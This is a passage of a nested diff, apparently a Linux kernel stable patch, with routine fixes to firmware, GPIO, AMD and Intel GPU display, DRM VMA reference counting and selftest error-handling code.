+ 	scmi_free_channel(cinfo, data, id);
+diff --git a/drivers/firmware/efi/runtime-wrappers.c b/drivers/firmware/efi/runtime-wrappers.c
+index 60075e0e4943a..1fba4e09cdcff 100644
+--- a/drivers/firmware/efi/runtime-wrappers.c
++++ b/drivers/firmware/efi/runtime-wrappers.c
+@@ -84,6 +84,7 @@ struct efi_runtime_work efi_rts_work;
+ 	else								\
+ 		pr_err("Failed to queue work to efi_rts_wq.\n");	\
+ 									\
++	WARN_ON_ONCE(efi_rts_work.status == EFI_ABORTED);		\
+ exit:									\
+ 	efi_rts_work.efi_rts_id = EFI_NONE;				\
+ 	efi_rts_work.status;						\
+diff --git a/drivers/firmware/google/coreboot_table.c b/drivers/firmware/google/coreboot_table.c
+index 9ca21feb9d454..f3694d3478019 100644
+--- a/drivers/firmware/google/coreboot_table.c
++++ b/drivers/firmware/google/coreboot_table.c
+@@ -93,7 +93,12 @@ static int coreboot_table_populate(struct device *dev, void *ptr)
+ 	for (i = 0; i < header->table_entries; i++) {
+ 		entry = ptr_entry;
+ 
+-		device = kzalloc(sizeof(struct device) + entry->size, GFP_KERNEL);
++		if (entry->size < sizeof(*entry)) {
++			dev_warn(dev, "coreboot table entry too small!\n");
++			return -EINVAL;
++		}
++
++		device = kzalloc(sizeof(device->dev) + entry->size, GFP_KERNEL);
+ 		if (!device)
+ 			return -ENOMEM;
+ 
+@@ -101,7 +106,7 @@ static int coreboot_table_populate(struct device *dev, void *ptr)
+ 		device->dev.parent = dev;
+ 		device->dev.bus = &coreboot_bus_type;
+ 		device->dev.release = coreboot_device_release;
+-		memcpy(&device->entry, ptr_entry, entry->size);
++		memcpy(device->raw, ptr_entry, entry->size);
+ 
+ 		ret = device_register(&device->dev);
+ 		if (ret) {
+diff --git a/drivers/firmware/google/coreboot_table.h b/drivers/firmware/google/coreboot_table.h
+index beb778674acdc..4a89277b99a39 100644
+--- a/drivers/firmware/google/coreboot_table.h
++++ b/drivers/firmware/google/coreboot_table.h
+@@ -66,6 +66,7 @@ struct coreboot_device {
+ 		struct coreboot_table_entry entry;
+ 		struct lb_cbmem_ref cbmem_ref;
+ 		struct lb_framebuffer framebuffer;
++		DECLARE_FLEX_ARRAY(u8, raw);
+ 	};
+ };
+ 
+diff --git a/drivers/gpio/gpio-ep93xx.c b/drivers/gpio/gpio-ep93xx.c
+index 2e17797091133..7edcdc5750802 100644
+--- a/drivers/gpio/gpio-ep93xx.c
++++ b/drivers/gpio/gpio-ep93xx.c
+@@ -148,7 +148,7 @@ static void ep93xx_gpio_f_irq_handler(struct irq_desc *desc)
+ 	 */
+ 	struct irq_chip *irqchip = irq_desc_get_chip(desc);
+ 	unsigned int irq = irq_desc_get_irq(desc);
+-	int port_f_idx = ((irq + 1) & 7) ^ 4; /* {19..22,47..50} -> {0..7} */
++	int port_f_idx = (irq & 7) ^ 4; /* {20..23,48..51} -> {0..7} */
+ 	int gpio_irq = EP93XX_GPIO_F_IRQ_BASE + port_f_idx;
+ 
+ 	chained_irq_enter(irqchip, desc);
+diff --git a/drivers/gpio/gpio-mxc.c b/drivers/gpio/gpio-mxc.c
+index c871602fc5ba9..853d9aa6b3b1f 100644
+--- a/drivers/gpio/gpio-mxc.c
++++ b/drivers/gpio/gpio-mxc.c
+@@ -18,6 +18,7 @@
+ #include <linux/module.h>
+ #include <linux/platform_device.h>
+ #include <linux/slab.h>
++#include <linux/spinlock.h>
+ #include <linux/syscore_ops.h>
+ #include <linux/gpio/driver.h>
+ #include <linux/of.h>
+@@ -147,6 +148,7 @@ static int gpio_set_irq_type(struct irq_data *d, u32 type)
+ {
+ 	struct irq_chip_generic *gc = irq_data_get_irq_chip_data(d);
+ 	struct mxc_gpio_port *port = gc->private;
++	unsigned long flags;
+ 	u32 bit, val;
+ 	u32 gpio_idx = d->hwirq;
+ 	int edge;
+@@ -185,6 +187,8 @@ static int gpio_set_irq_type(struct irq_data *d, u32 type)
+ 		return -EINVAL;
+ 	}
+ 
++	raw_spin_lock_irqsave(&port->gc.bgpio_lock, flags);
++
+ 	if (GPIO_EDGE_SEL >= 0) {
+ 		val = readl(port->base + GPIO_EDGE_SEL);
+ 		if (edge == GPIO_INT_BOTH_EDGES)
+@@ -204,15 +208,20 @@ static int gpio_set_irq_type(struct irq_data *d, u32 type)
+ 
+ 	writel(1 << gpio_idx, port->base + GPIO_ISR);
+ 
+-	return 0;
++	raw_spin_unlock_irqrestore(&port->gc.bgpio_lock, flags);
++
++	return port->gc.direction_input(&port->gc, gpio_idx);
+ }
+ 
+ static void mxc_flip_edge(struct mxc_gpio_port *port, u32 gpio)
+ {
+ 	void __iomem *reg = port->base;
++	unsigned long flags;
+ 	u32 bit, val;
+ 	int edge;
+ 
++	raw_spin_lock_irqsave(&port->gc.bgpio_lock, flags);
++
+ 	reg += GPIO_ICR1 + ((gpio & 0x10) >> 2); /* lower or upper register */
+ 	bit = gpio & 0xf;
+ 	val = readl(reg);
+@@ -227,9 +236,12 @@ static void mxc_flip_edge(struct mxc_gpio_port *port, u32 gpio)
+ 	} else {
+ 		pr_err("mxc: invalid configuration for GPIO %d: %x\n",
+ 		       gpio, edge);
+-		return;
++		goto unlock;
+ 	}
+ 	writel(val | (edge << (bit << 1)), reg);
++
++unlock:
++	raw_spin_unlock_irqrestore(&port->gc.bgpio_lock, flags);
+ }
+ 
+ /* handle 32 interrupts in one status register */
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+index 29f045079a3e1..404c839683b1c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+@@ -2130,7 +2130,7 @@ int amdgpu_amdkfd_map_gtt_bo_to_gart(struct amdgpu_device *adev, struct amdgpu_b
+ 	}
+ 
+ 	amdgpu_amdkfd_remove_eviction_fence(
+-		bo, bo->kfd_bo->process_info->eviction_fence);
++		bo, bo->vm_bo->vm->process_info->eviction_fence);
+ 
+ 	amdgpu_bo_unreserve(bo);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+index 99f5e38c4835e..3380daf42da8a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+@@ -586,10 +586,14 @@ void amdgpu_gfx_off_ctrl(struct amdgpu_device *adev, bool enable)
+ 		if (adev->gfx.gfx_off_req_count == 0 &&
+ 		    !adev->gfx.gfx_off_state) {
+ 			/* If going to s2idle, no need to wait */
+-			if (adev->in_s0ix)
+-				delay = GFX_OFF_NO_DELAY;
+-			schedule_delayed_work(&adev->gfx.gfx_off_delay_work,
++			if (adev->in_s0ix) {
++				if (!amdgpu_dpm_set_powergating_by_smu(adev,
++						AMD_IP_BLOCK_TYPE_GFX, true))
++					adev->gfx.gfx_off_state = true;
++			} else {
++				schedule_delayed_work(&adev->gfx.gfx_off_delay_work,
+ 					      delay);
++			}
+ 		}
+ 	} else {
+ 		if (adev->gfx.gfx_off_req_count == 0) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+index 725876b4f02ed..32b0ea8757fa5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+@@ -192,7 +192,6 @@ static int mes_v11_0_add_hw_queue(struct amdgpu_mes *mes,
+ 	mes_add_queue_pkt.trap_handler_addr = input->tba_addr;
+ 	mes_add_queue_pkt.tma_addr = input->tma_addr;
+ 	mes_add_queue_pkt.is_kfd_process = input->is_kfd_process;
+-	mes_add_queue_pkt.trap_en = 1;
+ 
+ 	/* For KFD, gds_size is re-used for queue size (needed in MES for AQL queues) */
+ 	mes_add_queue_pkt.is_aql_queue = input->is_aql_queue;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c b/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
+index ecb4c3abc6297..c06ada0844ba1 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
+@@ -200,7 +200,7 @@ static int add_queue_mes(struct device_queue_manager *dqm, struct queue *q,
+ 	queue_input.wptr_addr = (uint64_t)q->properties.write_ptr;
+ 
+ 	if (q->wptr_bo) {
+-		wptr_addr_off = (uint64_t)q->properties.write_ptr - (uint64_t)q->wptr_bo->kfd_bo->va;
++		wptr_addr_off = (uint64_t)q->properties.write_ptr & (PAGE_SIZE - 1);
+ 		queue_input.wptr_mc_addr = ((uint64_t)q->wptr_bo->tbo.resource->start << PAGE_SHIFT) + wptr_addr_off;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_svm.c b/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
+index 64fdf63093a00..63feea08904cb 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
+@@ -570,6 +570,15 @@ svm_range_vram_node_new(struct amdgpu_device *adev, struct svm_range *prange,
+ 		goto reserve_bo_failed;
+ 	}
+ 
++	if (clear) {
++		r = amdgpu_bo_sync_wait(bo, AMDGPU_FENCE_OWNER_KFD, false);
++		if (r) {
++			pr_debug("failed %d to sync bo\n", r);
++			amdgpu_bo_unreserve(bo);
++			goto reserve_bo_failed;
++		}
++	}
++
+ 	r = dma_resv_reserve_fences(bo->tbo.base.resv, 1);
+ 	if (r) {
+ 		pr_debug("failed %d to reserve bo\n", r);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index e10f1f15c9c43..85bd1f18259c7 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1737,10 +1737,6 @@ static void amdgpu_dm_fini(struct amdgpu_device *adev)
+ 		adev->dm.vblank_control_workqueue = NULL;
+ 	}
+ 
+-	for (i = 0; i < adev->dm.display_indexes_num; i++) {
+-		drm_encoder_cleanup(&adev->dm.mst_encoders[i].base);
+-	}
+-
+ 	amdgpu_dm_destroy_drm_device(&adev->dm);
+ 
+ #if defined(CONFIG_DRM_AMD_SECURE_DISPLAY)
+@@ -9404,6 +9400,8 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 	bool lock_and_validation_needed = false;
+ 	struct dm_crtc_state *dm_old_crtc_state, *dm_new_crtc_state;
+ #if defined(CONFIG_DRM_AMD_DC_DCN)
++	struct drm_dp_mst_topology_mgr *mgr;
++	struct drm_dp_mst_topology_state *mst_state;
+ 	struct dsc_mst_fairness_vars vars[MAX_PIPES];
+ #endif
+ 
+@@ -9652,6 +9650,28 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 		lock_and_validation_needed = true;
+ 	}
+ 
++#if defined(CONFIG_DRM_AMD_DC_DCN)
++	/* set the slot info for each mst_state based on the link encoding format */
++	for_each_new_mst_mgr_in_state(state, mgr, mst_state, i) {
++		struct amdgpu_dm_connector *aconnector;
++		struct drm_connector *connector;
++		struct drm_connector_list_iter iter;
++		u8 link_coding_cap;
++
++		drm_connector_list_iter_begin(dev, &iter);
++		drm_for_each_connector_iter(connector, &iter) {
++			if (connector->index == mst_state->mgr->conn_base_id) {
++				aconnector = to_amdgpu_dm_connector(connector);
++				link_coding_cap = dc_link_dp_mst_decide_link_encoding_format(aconnector->dc_link);
++				drm_dp_mst_update_slots(mst_state, link_coding_cap);
++
++				break;
++			}
++		}
++		drm_connector_list_iter_end(&iter);
++	}
++#endif
++
+ 	/**
+ 	 * Streams and planes are reset when there are changes that affect
+ 	 * bandwidth. Anything that affects bandwidth needs to go through
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index f72c013d3a5b0..16623f73ddbe6 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -120,23 +120,50 @@ enum dc_edid_status dm_helpers_parse_edid_caps(
+ }
+ 
+ static void
+-fill_dc_mst_payload_table_from_drm(struct drm_dp_mst_topology_state *mst_state,
+-				   struct amdgpu_dm_connector *aconnector,
++fill_dc_mst_payload_table_from_drm(struct dc_link *link,
++				   bool enable,
++				   struct drm_dp_mst_atomic_payload *target_payload,
+ 				   struct dc_dp_mst_stream_allocation_table *table)
+ {
+ 	struct dc_dp_mst_stream_allocation_table new_table = { 0 };
+ 	struct dc_dp_mst_stream_allocation *sa;
+-	struct drm_dp_mst_atomic_payload *payload;
++	struct link_mst_stream_allocation_table copy_of_link_table =
++										link->mst_stream_alloc_table;
++
++	int i;
++	int current_hw_table_stream_cnt = copy_of_link_table.stream_count;
++	struct link_mst_stream_allocation *dc_alloc;
++
++	/* TODO: refactor to set link->mst_stream_alloc_table directly if possible. */
++	if (enable) {
++		dc_alloc =
++		&copy_of_link_table.stream_allocations[current_hw_table_stream_cnt];
++		dc_alloc->vcp_id = target_payload->vcpi;
++		dc_alloc->slot_count = target_payload->time_slots;
++	} else {
++		for (i = 0; i < copy_of_link_table.stream_count; i++) {
++			dc_alloc =
++			&copy_of_link_table.stream_allocations[i];
++
++			if (dc_alloc->vcp_id == target_payload->vcpi) {
++				dc_alloc->vcp_id = 0;
++				dc_alloc->slot_count = 0;
++				break;
++			}
++		}
++		ASSERT(i != copy_of_link_table.stream_count);
++	}
+ 
+ 	/* Fill payload info*/
+-	list_for_each_entry(payload, &mst_state->payloads, next) {
+-		if (payload->delete)
+-			continue;
+-
+-		sa = &new_table.stream_allocations[new_table.stream_count];
+-		sa->slot_count = payload->time_slots;
+-		sa->vcp_id = payload->vcpi;
+-		new_table.stream_count++;
++	for (i = 0; i < MAX_CONTROLLER_NUM; i++) {
++		dc_alloc =
++			&copy_of_link_table.stream_allocations[i];
++		if (dc_alloc->vcp_id > 0 && dc_alloc->slot_count > 0) {
++			sa = &new_table.stream_allocations[new_table.stream_count];
++			sa->slot_count = dc_alloc->slot_count;
++			sa->vcp_id = dc_alloc->vcp_id;
++			new_table.stream_count++;
++		}
+ 	}
+ 
+ 	/* Overwrite the old table */
+@@ -185,7 +212,7 @@ bool dm_helpers_dp_mst_write_payload_allocation_table(
+ 	 * AUX message. The sequence is slot 1-63 allocated sequence for each
+ 	 * stream. AMD ASIC stream slot allocation should follow the same
+ 	 * sequence. copy DRM MST allocation to dc */
+-	fill_dc_mst_payload_table_from_drm(mst_state, aconnector, proposed_table);
++	fill_dc_mst_payload_table_from_drm(stream->link, enable, payload, proposed_table);
+ 
+ 	return true;
+ }
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index 6483ba266893d..8561e9b017a2e 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -468,7 +468,6 @@ static const struct drm_connector_helper_funcs dm_dp_mst_connector_helper_funcs
+ static void amdgpu_dm_encoder_destroy(struct drm_encoder *encoder)
+ {
+ 	drm_encoder_cleanup(encoder);
+-	kfree(encoder);
+ }
+ 
+ static const struct drm_encoder_funcs amdgpu_dm_encoder_funcs = {
+@@ -897,11 +896,6 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 	if (IS_ERR(mst_state))
+ 		return PTR_ERR(mst_state);
+ 
+-	mst_state->pbn_div = dm_mst_get_pbn_divider(dc_link);
+-#if defined(CONFIG_DRM_AMD_DC_DCN)
+-	drm_dp_mst_update_slots(mst_state, dc_link_dp_mst_decide_link_encoding_format(dc_link));
+-#endif
+-
+ 	/* Set up params */
+ 	for (i = 0; i < dc_state->stream_count; i++) {
+ 		struct dc_dsc_policy dsc_policy = {0};
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index d7b1ace6328a0..40b9d2ce08e66 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -3995,10 +3995,13 @@ static enum dc_status deallocate_mst_payload(struct pipe_ctx *pipe_ctx)
+ 	struct fixed31_32 avg_time_slots_per_mtp = dc_fixpt_from_int(0);
+ 	int i;
+ 	bool mst_mode = (link->type == dc_connection_mst_branch);
++	/* adjust for drm changes*/
++	bool update_drm_mst_state = true;
+ 	const struct link_hwss *link_hwss = get_link_hwss(link, &pipe_ctx->link_res);
+ 	const struct dc_link_settings empty_link_settings = {0};
+ 	DC_LOGGER_INIT(link->ctx->logger);
+ 
++
+ 	/* deallocate_mst_payload is called before disable link. When mode or
+ 	 * disable/enable monitor, new stream is created which is not in link
+ 	 * stream[] yet. For this, payload is not allocated yet, so de-alloc
+@@ -4014,7 +4017,7 @@ static enum dc_status deallocate_mst_payload(struct pipe_ctx *pipe_ctx)
+ 				&empty_link_settings,
+ 				avg_time_slots_per_mtp);
+ 
+-	if (mst_mode) {
++	if (mst_mode || update_drm_mst_state) {
+ 		/* when link is in mst mode, reply on mst manager to remove
+ 		 * payload
+ 		 */
+@@ -4077,11 +4080,18 @@ static enum dc_status deallocate_mst_payload(struct pipe_ctx *pipe_ctx)
+ 			stream->ctx,
+ 			stream);
+ 
++		if (!update_drm_mst_state)
++			dm_helpers_dp_mst_send_payload_allocation(
++				stream->ctx,
++				stream,
++				false);
++	}
++
++	if (update_drm_mst_state)
+ 		dm_helpers_dp_mst_send_payload_allocation(
+ 			stream->ctx,
+ 			stream,
+ 			false);
+-	}
+ 
+ 	return DC_OK;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index 4c20d17e7416e..cf96c3f2affe4 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -145,6 +145,7 @@ static struct cmn2asic_msg_mapping smu_v13_0_0_message_map[SMU_MSG_MAX_COUNT] =
+ 	MSG_MAP(SetBadMemoryPagesRetiredFlagsPerChannel,
+ 			    PPSMC_MSG_SetBadMemoryPagesRetiredFlagsPerChannel,   0),
+ 	MSG_MAP(AllowGpo,			PPSMC_MSG_SetGpoAllow,           0),
++	MSG_MAP(AllowIHHostInterrupt,		PPSMC_MSG_AllowIHHostInterrupt,       0),
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_0_clk_map[SMU_CLK_COUNT] = {
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index 51a46689cda70..4ca37261584a9 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -3372,6 +3372,9 @@ void drm_dp_remove_payload(struct drm_dp_mst_topology_mgr *mgr,
+ 
+ 	mgr->payload_count--;
+ 	mgr->next_start_slot -= payload->time_slots;
++
++	if (payload->delete)
++		drm_dp_mst_put_port_malloc(payload->port);
+ }
+ EXPORT_SYMBOL(drm_dp_remove_payload);
+ 
+@@ -4327,7 +4330,6 @@ int drm_dp_atomic_release_time_slots(struct drm_atomic_state *state,
+ 
+ 	drm_dbg_atomic(mgr->dev, "[MST PORT:%p] TU %d -> 0\n", port, payload->time_slots);
+ 	if (!payload->delete) {
+-		drm_dp_mst_put_port_malloc(port);
+ 		payload->pbn = 0;
+ 		payload->delete = true;
+ 		topology_state->payload_mask &= ~BIT(payload->vcpi - 1);
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 52d8800a8ab86..3659f0465a724 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -304,6 +304,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "Lenovo ideapad D330-10IGM"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
++	}, {	/* Lenovo Ideapad D330-10IGL (HD) */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "Lenovo ideapad D330-10IGL"),
++		},
++		.driver_data = (void *)&lcd800x1280_rightside_up,
+ 	}, {	/* Lenovo Yoga Book X90F / X91F / X91L */
+ 		.matches = {
+ 		  /* Non exact match to match all versions */
+diff --git a/drivers/gpu/drm/drm_vma_manager.c b/drivers/gpu/drm/drm_vma_manager.c
+index 7de37f8c68fd0..83229a031af0f 100644
+--- a/drivers/gpu/drm/drm_vma_manager.c
++++ b/drivers/gpu/drm/drm_vma_manager.c
+@@ -240,27 +240,8 @@ void drm_vma_offset_remove(struct drm_vma_offset_manager *mgr,
+ }
+ EXPORT_SYMBOL(drm_vma_offset_remove);
+ 
+-/**
+- * drm_vma_node_allow - Add open-file to list of allowed users
+- * @node: Node to modify
+- * @tag: Tag of file to remove
+- *
+- * Add @tag to the list of allowed open-files for this node. If @tag is
+- * already on this list, the ref-count is incremented.
+- *
+- * The list of allowed-users is preserved across drm_vma_offset_add() and
+- * drm_vma_offset_remove() calls. You may even call it if the node is currently
+- * not added to any offset-manager.
+- *
+- * You must remove all open-files the same number of times as you added them
+- * before destroying the node. Otherwise, you will leak memory.
+- *
+- * This is locked against concurrent access internally.
+- *
+- * RETURNS:
+- * 0 on success, negative error code on internal failure (out-of-mem)
+- */
+-int drm_vma_node_allow(struct drm_vma_offset_node *node, struct drm_file *tag)
++static int vma_node_allow(struct drm_vma_offset_node *node,
++			  struct drm_file *tag, bool ref_counted)
+ {
+ 	struct rb_node **iter;
+ 	struct rb_node *parent = NULL;
+@@ -282,7 +263,8 @@ int drm_vma_node_allow(struct drm_vma_offset_node *node, struct drm_file *tag)
+ 		entry = rb_entry(*iter, struct drm_vma_offset_file, vm_rb);
+ 
+ 		if (tag == entry->vm_tag) {
+-			entry->vm_count++;
++			if (ref_counted)
++				entry->vm_count++;
+ 			goto unlock;
+ 		} else if (tag > entry->vm_tag) {
+ 			iter = &(*iter)->rb_right;
+@@ -307,8 +289,58 @@ unlock:
+ 	kfree(new);
+ 	return ret;
+ }
++
++/**
++ * drm_vma_node_allow - Add open-file to list of allowed users
++ * @node: Node to modify
++ * @tag: Tag of file to remove
++ *
++ * Add @tag to the list of allowed open-files for this node. If @tag is
++ * already on this list, the ref-count is incremented.
++ *
++ * The list of allowed-users is preserved across drm_vma_offset_add() and
++ * drm_vma_offset_remove() calls. You may even call it if the node is currently
++ * not added to any offset-manager.
++ *
++ * You must remove all open-files the same number of times as you added them
++ * before destroying the node. Otherwise, you will leak memory.
++ *
++ * This is locked against concurrent access internally.
++ *
++ * RETURNS:
++ * 0 on success, negative error code on internal failure (out-of-mem)
++ */
++int drm_vma_node_allow(struct drm_vma_offset_node *node, struct drm_file *tag)
++{
++	return vma_node_allow(node, tag, true);
++}
+ EXPORT_SYMBOL(drm_vma_node_allow);
+ 
++/**
++ * drm_vma_node_allow_once - Add open-file to list of allowed users
++ * @node: Node to modify
++ * @tag: Tag of file to remove
++ *
++ * Add @tag to the list of allowed open-files for this node.
++ *
++ * The list of allowed-users is preserved across drm_vma_offset_add() and
++ * drm_vma_offset_remove() calls. You may even call it if the node is currently
++ * not added to any offset-manager.
++ *
++ * This is not ref-counted unlike drm_vma_node_allow() hence drm_vma_node_revoke()
++ * should only be called once after this.
++ *
++ * This is locked against concurrent access internally.
++ *
++ * RETURNS:
++ * 0 on success, negative error code on internal failure (out-of-mem)
++ */
++int drm_vma_node_allow_once(struct drm_vma_offset_node *node, struct drm_file *tag)
++{
++	return vma_node_allow(node, tag, false);
++}
++EXPORT_SYMBOL(drm_vma_node_allow_once);
++
+ /**
+  * drm_vma_node_revoke - Remove open-file from list of allowed users
+  * @node: Node to modify
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index 78b3427471bd7..b94bcceeff705 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -5216,9 +5216,7 @@ static bool intel_edp_init_connector(struct intel_dp *intel_dp,
+ 	intel_bios_init_panel(dev_priv, &intel_connector->panel,
+ 			      encoder->devdata, IS_ERR(edid) ? NULL : edid);
+ 
+-	intel_panel_add_edid_fixed_modes(intel_connector,
+-					 intel_connector->panel.vbt.drrs_type != DRRS_TYPE_NONE ||
+-					 intel_vrr_is_capable(intel_connector));
++	intel_panel_add_edid_fixed_modes(intel_connector, true);
+ 
+ 	/* MSO requires information from the EDID */
+ 	intel_edp_mso_init(intel_dp);
+diff --git a/drivers/gpu/drm/i915/display/intel_panel.c b/drivers/gpu/drm/i915/display/intel_panel.c
+index 41cec9dc42231..f72f4646c0d70 100644
+--- a/drivers/gpu/drm/i915/display/intel_panel.c
++++ b/drivers/gpu/drm/i915/display/intel_panel.c
+@@ -85,9 +85,10 @@ static bool is_alt_drrs_mode(const struct drm_display_mode *mode,
+ static bool is_alt_fixed_mode(const struct drm_display_mode *mode,
+ 			      const struct drm_display_mode *preferred_mode)
+ {
+-	return drm_mode_match(mode, preferred_mode,
+-			      DRM_MODE_MATCH_FLAGS |
+-			      DRM_MODE_MATCH_3D_FLAGS) &&
++	u32 sync_flags = DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_NHSYNC |
++		DRM_MODE_FLAG_PVSYNC | DRM_MODE_FLAG_NVSYNC;
++
++	return (mode->flags & ~sync_flags) == (preferred_mode->flags & ~sync_flags) &&
+ 		mode->hdisplay == preferred_mode->hdisplay &&
+ 		mode->vdisplay == preferred_mode->vdisplay;
+ }
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_mman.c b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+index 354c1d6dab846..d445e2d63c9c8 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_mman.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+@@ -697,7 +697,7 @@ insert:
+ 	GEM_BUG_ON(lookup_mmo(obj, mmap_type) != mmo);
+ out:
+ 	if (file)
+-		drm_vma_node_allow(&mmo->vma_node, file);
++		drm_vma_node_allow_once(&mmo->vma_node, file);
+ 	return mmo;
+ 
+ err:
+diff --git a/drivers/gpu/drm/i915/gem/selftests/huge_pages.c b/drivers/gpu/drm/i915/gem/selftests/huge_pages.c
+index c570cf780079a..436598f19522c 100644
+--- a/drivers/gpu/drm/i915/gem/selftests/huge_pages.c
++++ b/drivers/gpu/drm/i915/gem/selftests/huge_pages.c
+@@ -1697,7 +1697,7 @@ static int igt_shrink_thp(void *arg)
+ 			I915_SHRINK_ACTIVE);
+ 	i915_vma_unpin(vma);
+ 	if (err)
+-		goto out_put;
++		goto out_wf;
+ 
+ 	/*
+ 	 * Now that the pages are *unpinned* shrinking should invoke
+@@ -1713,19 +1713,19 @@ static int igt_shrink_thp(void *arg)
+ 		pr_err("unexpected pages mismatch, should_swap=%s\n",
+ 		       str_yes_no(should_swap));
+ 		err = -EINVAL;
+-		goto out_put;
++		goto out_wf;
+ 	}
+ 
+ 	if (should_swap == (obj->mm.page_sizes.sg || obj->mm.page_sizes.phys)) {
+ 		pr_err("unexpected residual page-size bits, should_swap=%s\n",
+ 		       str_yes_no(should_swap));
+ 		err = -EINVAL;
+-		goto out_put;
++		goto out_wf;
+ 	}
+ 
+ 	err = i915_vma_pin(vma, 0, 0, flags);
+ 	if (err)
+-		goto out_put;
++		goto out_wf;
+ 
+ 	while (n--) {
+ 		err = cpu_check(obj, n, 0xdeadbeaf);
+diff --git a/drivers/gpu/drm/i915/selftests/intel_scheduler_helpers.c b/drivers/gpu/drm/i915/selftests/intel_scheduler_helpers.c
+index 310fb83c527eb..2990dd4d4a0d8 100644
+--- a/drivers/gpu/drm/i915/selftests/intel_scheduler_helpers.c
++++ b/drivers/gpu/drm/i915/selftests/intel_scheduler_helpers.c
+@@ -28,8 +28,7 @@ struct intel_engine_cs *intel_selftest_find_any_engine(struct intel_gt *gt)
+ 
+ int intel_selftest_modify_policy(struct intel_engine_cs *engine,
+ 				 struct intel_selftest_saved_policy *saved,
+-				 u32 modify_type)
+-
++				 enum selftest_scheduler_modify modify_type)
+ {
+ 	int err;
+ 
+diff --git a/drivers/gpu/drm/msm/adreno/a6xx_gmu.c b/drivers/gpu/drm/msm/adreno/a6xx_gmu.c
+index e033d6a67a20c..870252bef23f3 100644
+--- a/drivers/gpu/drm/msm/adreno/a6xx_gmu.c
++++ b/drivers/gpu/drm/msm/adreno/a6xx_gmu.c
+@@ -876,7 +876,8 @@ static void a6xx_gmu_rpmh_off(struct a6xx_gmu *gmu)
